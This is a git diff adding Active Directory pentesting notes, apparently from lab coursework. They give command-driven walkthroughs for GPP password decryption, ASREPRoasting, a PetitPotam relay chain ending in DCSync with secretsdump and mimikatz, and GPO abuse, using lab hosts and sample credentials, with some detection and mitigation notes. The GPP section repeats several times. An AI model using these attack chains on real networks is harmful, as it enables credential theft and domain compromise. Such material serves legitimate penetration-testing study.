diff --git a/docs/active-directory-from-linux-enumeration.md b/docs/active-directory-from-linux-enumeration.md index 02062585e..4764cc149 100644 --- a/docs/active-directory-from-linux-enumeration.md +++ b/docs/active-directory-from-linux-enumeration.md @@ -326,9 +326,103 @@ ldapsearch -h $ip -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 Other tools related to ldap: `windapsearch.py`, `ldapsearch`, `ad-ldapdomaindump.py`. +## 4. Credentials +### Credentials in SMB Shares and SYSVOL Scripts -## 4. Shares +The SYSVOL share can be a treasure trove of data, especially in large organizations. It is recommendable always have to look at it. + +#### Group Policy Preferences (GPP) Passwords + +When a new GPP is created, an .xml file is created in the SYSVOL share, which is also cached locally on endpoints that the Group Policy applies to. These files can include those used to: + +- Map drives (drives.xml) +- Create local users +- Create printer config files (printers.xml) +- Creating and updating services (services.xml) +- Creating scheduled tasks (scheduledtasks.xml) +- Changing local admin passwords. + +These files can contain an array of configuration data and defined passwords. The `cpassword` attribute value is AES-256 bit encrypted, but Microsoft [published the AES private key on MSDN](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN), which can be used to decrypt the password. Any domain user can read these files as they are stored on the SYSVOL share, and all authenticated users in a domain, by default, have read access to this domain controller share. + +This was patched in 2014 [MS14-025 Vulnerability in GPP could allow elevation of privilege](https://support.microsoft.com/en-us/topic/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevation-of-privilege-may-13-2014-60734e15-af79-26ca-ea53-8cd617073c30), to prevent administrators from setting passwords using GPP. The patch does not remove existing Groups.xml files with passwords from SYSVOL. If you delete the GPP policy instead of unlinking it from the OU, the cached copy on the local computer remains. + +In older Windows environments like Server 2003 and 2008, the XML file stores encrypted AES passwords in the “cpassword” parameter that can get decrypted with Microsoft’s public AES key (link). If you retrieve the cpassword value more manually, the `gpp-decrypt` utility can be used to decrypt the password as follows: + +```bash +gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE +``` + +Locating & Retrieving GPP Passwords with CrackMapExec + +```shell-session +crackmapexec smb -L | grep gpp +``` + +To access the GPP information and decrypt its stored password using CrackMapExec, we can use 2 modules — `**gpp_password**` and `**gpp_autologin**` modules. The `**gpp_password**` decrypts passwords stored in the Group.xml file, while `**gpp_autologin**` retrieves autologin information from the Registry.xml file in the preferences folder. + + +```bash +crackmapexec smb $domainControllerIP -u $user -p $password -M gpp_autologin +# Example: +# crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin +``` + +Results: +``` +GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Usernames: ['guarddesk'] +GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Domains: ['INLANEFREIGHT.LOCAL'] +GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Passwords: ['ILFreightguardadmin!'] +``` + +### 💡 ASREPRoasting + +It's possible to obtain the Ticket Granting Ticket (TGT) for any account that has the Do not require Kerberos pre-authentication setting enabled. + +ASREPRoasting is similar to Kerberoasting, but it involves attacking the AS-REP instead of the TGS-REP. An SPN is not required. This setting can be enumerated with PowerView or built-in tools such as the PowerShell AD module. + +#### DONT_REQ_PREAUTH Value using Get-DomainUser + +Enumerating for DONT_REQ_PREAUTH Value using Get-DomainUser + +```powershell +Import-Module .\PowerView.ps1 +Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl +``` + +With this information in hand, the Rubeus tool can be leveraged to retrieve the AS-REP in the proper format for offline hash cracking. This attack does not require any domain user context and can be done by just knowing the SAM name for the user without Kerberos pre-auth. + +```powershell +# Retrieving AS-REP in Proper Format using Rubeus +.\Rubeus.exe asreproast /user:$user /nowrap /format:hashcat +# Example: +# .\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat +``` + +Cracking the Hash Offline with Hashcat: + +```bash +hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt +``` + +#### DONT_REQ_PREAUTH Value using kerbrute + +```shell-session +kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt +``` + +However, this will be as accurate as the user list. + + +#### Get-NPUsers.py from the Impacket toolkit + +```bash +# Retuns all users that with DONT_REQ_PREAUTH amd UF_DONT_REQ_PREAUTH +GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile jsmith.txt | grep -v SessionError +``` + + +## 5. Shares ### crackmapexec @@ -418,3 +512,4 @@ enumprivs lsaenumsid ``` + diff --git a/docs/active-directory-from-windows-attacks.md b/docs/active-directory-from-windows-attacks.md index d1295c6e2..5c017b36d 100644 --- a/docs/active-directory-from-windows-attacks.md +++ b/docs/active-directory-from-windows-attacks.md @@ -11,7 +11,6 @@ tags: --- # Attacking Active Directory from Windows - [Index of Active Directory](active-directory.md) !!! tip "Attacking from linux" @@ -26,7 +25,7 @@ tags: - [Privileges escalation in Active Directory from Windows](active-directory-from-windows-privilege-escalation.md) -## Password spraying +## 🍥 Password spraying ### DomainPasswordSpray @@ -69,7 +68,7 @@ crackmapexec smb $ip/23 -u /folder/userlist.txt -u administrator -H 88ad09182de6 In the Domain Controller’s security log, many instances of event ID [4625: An account failed to log on](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625) over a short period may indicate a password spraying attack. Organizations should have rules to correlate many logon failures within a set time interval to trigger an alert. A more savvy attacker may avoid SMB password spraying and instead target LDAP. Organizations should also monitor event ID [4771: Kerberos pre-authentication failed](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4771), which may indicate an LDAP password spraying attempt. To do so, they will need to enable Kerberos logging. This [post](https://www.hub.trimarcsecurity.com/post/trimarc-research-detecting-password-spraying-with-security-event-auditing) details research around detecting password spraying using Windows Security Event Logging. -## LLMNR/NBT-NS Poisoning +## 💌 LLMNR/NBT-NS Poisoning [See more](5355-LLMNR.md). @@ -191,4 +190,265 @@ Press ESC to enter/exit interactive console. The console gives us access to capt # see which usernames we have collected. GET NTLMV2USERNAMES -``` \ No newline at end of file +``` + + +## ❌ Zerologon + +[See https://www.crowdstrike.com/en-us/blog/cve-2020-1472-zerologon-security-advisory/.](https://www.crowdstrike.com/en-us/blog/cve-2020-1472-zerologon-security-advisory/) + + +## ⛓️DCShadow + +[See https://blog.netwrix.com/2022/09/28/dcshadow_attack/](https://blog.netwrix.com/2022/09/28/dcshadow_attack/) + + +## 🍟 PetitPotam (MS-EFSRPC) + +! tips "" + - [NTLM relaying to AD CS - On certificates, printers and a little hippo](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) + +PetitPotam ([CVE-2021-36942](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942)) is an LSA spoofing vulnerability that was patched in August of 2021. The flaw allows an unauthenticated attacker to coerce a Domain Controller to authenticate against another host using NTLM over port 445 via the [Local Security Authority Remote Protocol (LSARPC)](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-lsad/1b5471ef-4c33-4a91-b079-dfcbb82f05cc) by abusing Microsoft’s [Encrypting File System Remote Protocol (MS-EFSRPC)](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31). + +This technique allows an unauthenticated attacker to take over a Windows domain where [Active Directory Certificate Services (AD CS)](https://docs.microsoft.com/en-us/learn/modules/implement-manage-active-directory-certificate-services/2-explore-fundamentals-of-pki-ad-cs) is in use. In the attack, an authentication request from the targeted Domain Controller is relayed to the Certificate Authority (CA) host's Web Enrollment page and makes a Certificate Signing Request (CSR) for a new digital certificate. + + This certificate can then be used with a tool such as `Rubeus` or `gettgtpkinit.py` from [PKINITtools](https://github.com/dirkjanm/PKINITtools) to request a TGT for the Domain Controller, which can then be used to achieve domain compromise via a DCSync attack. + + +First off, we need to start `ntlmrelayx.py` in one window on our attack host, specifying the Web Enrollment URL for the CA host and using either the KerberosAuthentication or DomainController AD CS template. If we didn't know the location of the CA, we could use a tool such as [certi](https://github.com/zer1t0/certi) to attempt to locate it. + +### Step 1: capture the base64 certificate + +```bash +# Access the host machine. For instance with ssh +ssh $user@$ip + +# Start ntlmrelayx.py +sudo ntlmrelayx.py -debug -smb2support --target http://$hostname.$domain/certsrv/certfnsh.asp --adcs --template DomainController +# Example: +# sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController +``` + + +In another terminal connected via ssh with the host machine, user  [PetitPotam.py](https://github.com/topotam/PetitPotam). + +```bash +git clone https://github.com/topotam/PetitPotam.git +``` + +```bash +# Run this tool to attempt to coerce the Domain Controller to authenticate to our host where ntlmrelayx.py is running +python3 PetitPotam.py $HostIP $DomainControllerIP +# Example: +# python3 PetitPotam.py 172.16.5.225 172.16.5.5 +``` + +In the terminal with the `ntlmrelayx.py`  running we will see the base64 encoded certificate for the Domain Controller if the attack is successful. + +### Step 2: Request a TGT + +Next step,  we can take this base64 certificate and use `gettgtpkinit.py` to request a Ticket-Granting-Ticket (TGT) for the domain controller: + +```bash +python3 /opt/PKINITtools/gettgtpkinit.py $domain/$host\$ -pfx-base64 $base64EncodedCertificate filename.ccache +# Example: +# python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGS...SNIP...QQIgaSODoMHZaA= dc01.ccache +#  `dc01.ccache` file: The TGT requested above was saved down to this file +``` + + +Set the KRB5CCNAME environment variable, so our attack host uses the `dc01.ccache` file for Kerberos authentication attempts. + +```bash +export KRB5CCNAME=filename.ccache +# Example: +# export KRB5CCNAME=dc01.ccache +``` + +### Step 3: Retrieve NTLM password hashes with DCSync attack + +Use this TGT with secretsdump.py to perform a DCSYnc and retrieve one or all of the NTLM password hashes for the domain. + +```bash +secretsdump.py -just-dc-user $domain/administrator -k -no-pass "$hostName"@$hostName.$domain +# Example: +# secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL +``` + +We can see this by typing `klist` (using the `klist` command requires installation of the [krb5-user](https://packages.ubuntu.com/focal/krb5-user) package on our attack host. + +```shell-session +klist +# Results: +# Ticket cache: FILE:dc01.ccache +# Default principal: ACADEMY-EA-DC01$@INLANEFREIGHT.LOCAL +# Valid starting Expires Service principal +# 04/05/2022 15:56:34 04/06/2022 01:56:34 krbtgt/INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL +``` + +Confirming Admin Access to the Domain Controller. Finally, we could use the NT hash for the built-in Administrator account to authenticate to the Domain Controller: + +```bash +crackmapexec smb 172.16.5.5 -u administrator -H 88ad09182de639ccc6579eb0849751cf +``` + +### Optional path #1: Submit a TGS for ourselves + +**Submitting a TGS Request for Ourselves Using getnthash.py** + +We can also take an alternate route once we have the TGT for our target. Using the tool `getnthash.py` from PKINITtools we could request the NT hash for our target host/user by using Kerberos U2U to submit a TGS request with the [Privileged Attribute Certificate (PAC)](https://stealthbits.com/blog/what-is-the-kerberos-pac/) which contains the NT hash for the target. This can be decrypted with the AS-REP encryption key we obtained when requesting the TGT earlier. + +```bash +python /opt/PKINITtools/getnthash.py -key $minikerberosTGTHash $domain$/$hostname$ +# Example: +# python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$ +# The $minikerberosTGTHash is obtained from the output of gettgtpkinit.py to request a Ticket-Granting-Ticket (TGT) for the domain controller. +``` + +**Submitting a TGS Request for Ourselves Using getnthash.py** + +```bash +secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba +``` + +### Optional path #2: rubeus to generate TGT and TGS + +once we obtain the base64 certificate via ntlmrelayx.py, we could use the certificate with the Rubeus tool on a Windows attack host to request a TGT ticket and perform a pass-the-ticket (PTT) attack all at once. + +Setting the KRB5CCNAME Environment Variable + + +```powershell +.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate:MIIStQIBAzCCEn8GCSqGSIb3DQEHAaCCEn... SNIP...J4ihw= /ptt +``` + +We can then type klist to confirm that the ticket is in memory. + +```powershell +klist +``` + +since Domain Controllers have replication privileges in the domain, we can use the pass-the-ticket to perform a DCSync attack using Mimikatz from our Windows attack host. + +```powershell +cd .\mimikatz\x64\ +.\mimikatz.exe +lsadump::dcsync /user:inlanefreight\krbtgt +``` + + +### PetitPotam Mitigations + +First off, the patch for [CVE-2021-36942](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942) should be applied to any affected hosts. Below are some further hardening steps that can be taken: + +- To prevent NTLM relay attacks, use [Extended Protection for Authentication](https://docs.microsoft.com/en-us/security-updates/securityadvisories/2009/973811) along with enabling [Require SSL](https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429) to only allow HTTPS connections for the Certificate Authority Web Enrollment and Certificate Enrollment Web Service services +- [Disabling NTLM authentication](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-ntlm-authentication-in-this-domain) for Domain Controllers +- Disabling NTLM on AD CS servers using [Group Policy](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-incoming-ntlm-traffic) +- Disabling NTLM for IIS on AD CS servers where the Certificate Authority Web Enrollment and Certificate Enrollment Web Service services are in use. + + + + +## 👃 Sniffing LDAP Credentials + +Many applications and printers store LDAP credentials in their web admin console to connect to the domain. These consoles are often left with weak or default passwords. Sometimes, these credentials can be viewed in cleartext. Other times, the application has a `test connection` function that we can use to gather credentials by changing the LDAP IP address to that of our attack host and setting up a `netcat` listener on LDAP port 389. When the device attempts to test the LDAP connection, it will send the credentials to our machine, often in cleartext. + + +## 👥 Group Policy Preferences (GPP) Passwords + +When a new GPP is created, an .xml file is created in the SYSVOL share, which is also cached locally on endpoints that the Group Policy applies to. These files can include those used to: + +- Map drives (drives.xml) +- Create local users +- Create printer config files (printers.xml) +- Creating and updating services (services.xml) +- Creating scheduled tasks (scheduledtasks.xml) +- Changing local admin passwords. + +These files can contain an array of configuration data and defined passwords. The `cpassword` attribute value is AES-256 bit encrypted, but Microsoft [published the AES private key on MSDN](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN), which can be used to decrypt the password. Any domain user can read these files as they are stored on the SYSVOL share, and all authenticated users in a domain, by default, have read access to this domain controller share. + +This was patched in 2014 [MS14-025 Vulnerability in GPP could allow elevation of privilege](https://support.microsoft.com/en-us/topic/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevation-of-privilege-may-13-2014-60734e15-af79-26ca-ea53-8cd617073c30), to prevent administrators from setting passwords using GPP. The patch does not remove existing Groups.xml files with passwords from SYSVOL. If you delete the GPP policy instead of unlinking it from the OU, the cached copy on the local computer remains. + +In older Windows environments like Server 2003 and 2008, the XML file stores encrypted AES passwords in the “cpassword” parameter that can get decrypted with Microsoft’s public AES key (link). If you retrieve the cpassword value more manually, the `gpp-decrypt` utility can be used to decrypt the password as follows: + +```bash +gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE +``` + +Locating & Retrieving GPP Passwords with CrackMapExec + +```shell-session +crackmapexec smb -L | grep gpp +``` + +To access the GPP information and decrypt its stored password using CrackMapExec, we can use 2 modules — `**gpp_password**` and `**gpp_autologin**` modules. The `**gpp_password**` decrypts passwords stored in the Group.xml file, while `**gpp_autologin**` retrieves autologin information from the Registry.xml file in the preferences folder. + + +```bash +crackmapexec smb $domainControllerIP -u $user -p $password -M gpp_autologin +# Example: +# crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin +``` + +Results: +``` +GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Usernames: ['guarddesk'] +GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Domains: ['INLANEFREIGHT.LOCAL'] +GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Passwords: ['ILFreightguardadmin!'] +``` + + + +## Group Policy Object Abuse + +We can enumerate GPO information using many of the tools we've been using throughout this module such as PowerView and BloodHound. We can also use [group3r](https://github.com/Group3r/Group3r), [ADRecon](https://github.com/sense-of-security/ADRecon), [PingCastle](https://www.pingcastle.com/), among others, to audit the security of GPOs in a domain. + +### Powershell + +If Group Policy Management Tools are installed on the host we are working from, we can use various built-in [GroupPolicy cmdlets](https://docs.microsoft.com/en-us/powershell/module/grouppolicy/?view=windowsserver2022-ps) such as `Get-GPO` to perform the same enumeration. + +```powershell +Get-GPO -All | Select DisplayName +``` + + +### Powerview +Using the [Get-DomainGPO](https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainGPO) function from PowerView, we can get a listing of GPOs by name. + +```powershell +Import-Module .\PowerView.ps1 +Get-DomainGPO |select displayname +``` + +Enumerating GPO Names with PowerView + +```powershell +$sid=Convert-NameToSid "Domain Users" +Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid} +``` + +Results: + +``` +ObjectDN : CN={7CA9C789-14CE-46E3-A722-83F4097AF532},CN=Policies,CN=System,DC=INLANEFREIGHT,DC=LOCAL +ObjectSID : +ActiveDirectoryRights : CreateChild, DeleteChild, ReadProperty, WriteProperty, Delete, GenericExecute, WriteDacl, WriteOwner + +... SNIP ... + +``` + +Converting GPO GUID to Name: + +```powershell +Get-GPO -Guid $GUID +# Example: +# Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532 +# In this case we can see that the `Domain Users` group has several rights over the `Disconnect Idle RDP` GPO. +``` + +Checking in BloodHound, we can see that the `Domain Users` group has several rights over the `Disconnect Idle RDP` GPO. If we select the GPO in BloodHound and scroll down to `Affected Objects` on the `Node Info` tab, we can see that this GPO is applied to one OU, which contains four computer objects. + +We could use a tool such as [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse) to take advantage of this GPO misconfiguration by performing actions such as adding a user that we control to the local admins group on one of the affected hosts, creating an immediate scheduled task on one of the hosts to give us a reverse shell, or configure a malicious computer startup script to provide us with a reverse shell or similar. + +**When using a tool like this, we need to be careful because commands can be run that affect every computer within the OU that the GPO is linked to** \ No newline at end of file diff --git a/docs/active-directory-from-windows-enumeration.md b/docs/active-directory-from-windows-enumeration.md index 326843b2a..9be56d77d 100644 --- a/docs/active-directory-from-windows-enumeration.md +++ b/docs/active-directory-from-windows-enumeration.md @@ -516,6 +516,125 @@ Get-ChildItem $regkey |foreach { Set-ItemProperty -Path "$regkey\$($_.pschildnam Some detection methods: [https://www.praetorian.com/blog/a-simple-and-effective-way-to-detect-broadcast-name-resolution-poisoning-bnrp/](https://www.praetorian.com/blog/a-simple-and-effective-way-to-detect-broadcast-name-resolution-poisoning-bnrp/) + +### Finding Passwords in the Description Field using Get-Domain User + +```powershell +# Import PowerView.ps1 +Import-Module .\PowerView.ps1 +# Find passwords in descriptions +Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null} +``` + +### PASSWD_NOTREQD Field + +It is possible to come across domain accounts with the passwd_notreqd field set in the userAccountControl attribute. If this is set, the user is not subject to the current password policy length, meaning they could have a shorter password or no password at all (if empty passwords are allowed in the domain). + + +```powershell +# Import PowerView.ps1 +Import-Module .\PowerView.ps1 +# Find passwords in descriptions +Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol +``` + +### Credentials in SMB Shares and SYSVOL Scripts + +The SYSVOL share can be a treasure trove of data, especially in large organizations. It is recommendable always have to look at it. + +#### Group Policy Preferences (GPP) Passwords + +When a new GPP is created, an .xml file is created in the SYSVOL share, which is also cached locally on endpoints that the Group Policy applies to. These files can include those used to: + +- Map drives (drives.xml) +- Create local users +- Create printer config files (printers.xml) +- Creating and updating services (services.xml) +- Creating scheduled tasks (scheduledtasks.xml) +- Changing local admin passwords. + +These files can contain an array of configuration data and defined passwords. The `cpassword` attribute value is AES-256 bit encrypted, but Microsoft [published the AES private key on MSDN](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN), which can be used to decrypt the password. Any domain user can read these files as they are stored on the SYSVOL share, and all authenticated users in a domain, by default, have read access to this domain controller share. + +This was patched in 2014 [MS14-025 Vulnerability in GPP could allow elevation of privilege](https://support.microsoft.com/en-us/topic/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevation-of-privilege-may-13-2014-60734e15-af79-26ca-ea53-8cd617073c30), to prevent administrators from setting passwords using GPP. The patch does not remove existing Groups.xml files with passwords from SYSVOL. If you delete the GPP policy instead of unlinking it from the OU, the cached copy on the local computer remains. + +In older Windows environments like Server 2003 and 2008, the XML file stores encrypted AES passwords in the “cpassword” parameter that can get decrypted with Microsoft’s public AES key (link). If you retrieve the cpassword value more manually, the `gpp-decrypt` utility can be used to decrypt the password as follows: + +```bash +gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE +``` + +Locating & Retrieving GPP Passwords with CrackMapExec + +```shell-session +crackmapexec smb -L | grep gpp +``` + +To access the GPP information and decrypt its stored password using CrackMapExec, we can use 2 modules — `**gpp_password**` and `**gpp_autologin**` modules. The `**gpp_password**` decrypts passwords stored in the Group.xml file, while `**gpp_autologin**` retrieves autologin information from the Registry.xml file in the preferences folder. + + +```bash +crackmapexec smb $domainControllerIP -u $user -p $password -M gpp_autologin +# Example: +# crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin +``` + +Results: +``` +GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Usernames: ['guarddesk'] +GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Domains: ['INLANEFREIGHT.LOCAL'] +GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Passwords: ['ILFreightguardadmin!'] +``` + +### 💡 ASREPRoasting + +It's possible to obtain the Ticket Granting Ticket (TGT) for any account that has the Do not require Kerberos pre-authentication setting enabled. + +ASREPRoasting is similar to Kerberoasting, but it involves attacking the AS-REP instead of the TGS-REP. An SPN is not required. This setting can be enumerated with PowerView or built-in tools such as the PowerShell AD module. + +#### DONT_REQ_PREAUTH Value using Get-DomainUser + +Enumerating for DONT_REQ_PREAUTH Value using Get-DomainUser + +```powershell +Import-Module .\PowerView.ps1 +Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl +``` + +With this information in hand, the Rubeus tool can be leveraged to retrieve the AS-REP in the proper format for offline hash cracking. This attack does not require any domain user context and can be done by just knowing the SAM name for the user without Kerberos pre-auth. + +```powershell +# Retrieving AS-REP in Proper Format using Rubeus +.\Rubeus.exe asreproast /user:$user /nowrap /format:hashcat +# Example: +# .\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat +``` + +Cracking the Hash Offline with Hashcat: + +```bash +hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt +``` + +#### DONT_REQ_PREAUTH Value using kerbrute + +```shell-session +# From linux +kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt + +# From Windows + .\kerbrute_Windows.exe userenum -d inlanefreight.local --dc 172.16.5.5 .\users.txt +``` + +However, this will be as accurate as the user list. + + +#### Get-NPUsers.py from the Impacket toolkit + +```bash +# Retuns all users that with DONT_REQ_PREAUTH amd UF_DONT_REQ_PREAUTH +GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile jsmith.txt | grep -v SessionError +``` + ## 3. Password policy Some tools work for this end: `net.exe`, PowerView, CrackMapExec ported to Windows, SharpMapExec, SharpView, etc. @@ -559,6 +678,49 @@ net accounts /domain net user %username% ``` +### Group Policy Preferences (GPP) Passwords + +When a new GPP is created, an .xml file is created in the SYSVOL share, which is also cached locally on endpoints that the Group Policy applies to. These files can include those used to: + +- Map drives (drives.xml) +- Create local users +- Create printer config files (printers.xml) +- Creating and updating services (services.xml) +- Creating scheduled tasks (scheduledtasks.xml) +- Changing local admin passwords. + +These files can contain an array of configuration data and defined passwords. The `cpassword` attribute value is AES-256 bit encrypted, but Microsoft [published the AES private key on MSDN](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN), which can be used to decrypt the password. Any domain user can read these files as they are stored on the SYSVOL share, and all authenticated users in a domain, by default, have read access to this domain controller share. + +This was patched in 2014 [MS14-025 Vulnerability in GPP could allow elevation of privilege](https://support.microsoft.com/en-us/topic/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevation-of-privilege-may-13-2014-60734e15-af79-26ca-ea53-8cd617073c30), to prevent administrators from setting passwords using GPP. The patch does not remove existing Groups.xml files with passwords from SYSVOL. If you delete the GPP policy instead of unlinking it from the OU, the cached copy on the local computer remains. + +In older Windows environments like Server 2003 and 2008, the XML file stores encrypted AES passwords in the “cpassword” parameter that can get decrypted with Microsoft’s public AES key (link). If you retrieve the cpassword value more manually, the `gpp-decrypt` utility can be used to decrypt the password as follows: + +```bash +gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE +``` + +Locating & Retrieving GPP Passwords with CrackMapExec + +```shell-session +crackmapexec smb -L | grep gpp +``` + +To access the GPP information and decrypt its stored password using CrackMapExec, we can use 2 modules — `**gpp_password**` and `**gpp_autologin**` modules. The `**gpp_password**` decrypts passwords stored in the Group.xml file, while `**gpp_autologin**` retrieves autologin information from the Registry.xml file in the preferences folder. + + +```bash +crackmapexec smb $domainControllerIP -u $user -p $password -M gpp_autologin +# Example: +# crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin +``` + +Results: +``` +GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Usernames: ['guarddesk'] +GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Domains: ['INLANEFREIGHT.LOCAL'] +GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Passwords: ['ILFreightguardadmin!'] +``` + ## 4. Networks @@ -867,3 +1029,85 @@ Snaffler.exe -s -d $domain -o snaffler.log -v data # -v: verbosity level. "data" is best as it only displays results to the screen ``` +## 7. DNS Records + +! tips "" + - [Getting in the Zone: dumping Active Directory DNS using adidnsdump](https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/) + - [See the tool adidnsdump](adidnsdump.md) + + +### adidnsdump + +[See adidnsdump](adidnsdump.md). + +We can use a tool such as adidnsdump to enumerate all DNS records in a domain using a valid domain user account. The tool works because, by default, all users can list the child objects of a DNS zone in an AD environment. By default, querying DNS records using LDAP does not return all results. So by using the `adidnsdump` tool, we can resolve all records in the zone and potentially find something useful for our engagement. + +```bash +adidnsdump -u $domain\\$user ldap://$DomainControllerIP +# Example: +# adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 + +# Viewing the Contents of the records.csv File +head records.csv + +# If we run again with the -r flag the tool will attempt to resolve unknown records by performing an A query. +adidnsdump -u $domain\\$user ldap://$DomainControllerIP -r +# Example: +# adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r + +# Now records.csv will include previously hidden records +head records.csv +``` + + + +## 8. Group Policy Object (GPO) + +We can enumerate GPO information using many of the tools we've been using throughout this module such as PowerView and BloodHound. We can also use [group3r](https://github.com/Group3r/Group3r), [ADRecon](https://github.com/sense-of-security/ADRecon), [PingCastle](https://www.pingcastle.com/), among others, to audit the security of GPOs in a domain. + +### Powershell + +If Group Policy Management Tools are installed on the host we are working from, we can use various built-in [GroupPolicy cmdlets](https://docs.microsoft.com/en-us/powershell/module/grouppolicy/?view=windowsserver2022-ps) such as `Get-GPO` to perform the same enumeration. + +```powershell +Get-GPO -All | Select DisplayName +``` + + +### Powerview +Using the [Get-DomainGPO](https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainGPO) function from PowerView, we can get a listing of GPOs by name. + +```powershell +Import-Module .\PowerView.ps1 +Get-DomainGPO |select displayname +``` + +Enumerating GPO Names with PowerView + +```powershell +$sid=Convert-NameToSid "Domain Users" +Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid} +``` + +Results: + +``` +ObjectDN : CN={7CA9C789-14CE-46E3-A722-83F4097AF532},CN=Policies,CN=System,DC=INLANEFREIGHT,DC=LOCAL +ObjectSID : +ActiveDirectoryRights : CreateChild, DeleteChild, ReadProperty, WriteProperty, Delete, GenericExecute, WriteDacl, WriteOwner + +... SNIP ... + +``` + +Converting GPO GUID to Name: + +```powershell +Get-GPO -Guid $GUID +# Example: +# Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532 +# In this case we can see that the `Domain Users` group has several rights over the `Disconnect Idle RDP` GPO. +``` + +[See how to take this attack further](active-directory-from-windows-attacks.md#group-policy-object-abuse). + diff --git a/docs/active-directory-from-windows-privilege-escalation.md b/docs/active-directory-from-windows-privilege-escalation.md index b903078b2..6c91efae8 100644 --- a/docs/active-directory-from-windows-privilege-escalation.md +++ b/docs/active-directory-from-windows-privilege-escalation.md @@ -39,7 +39,7 @@ 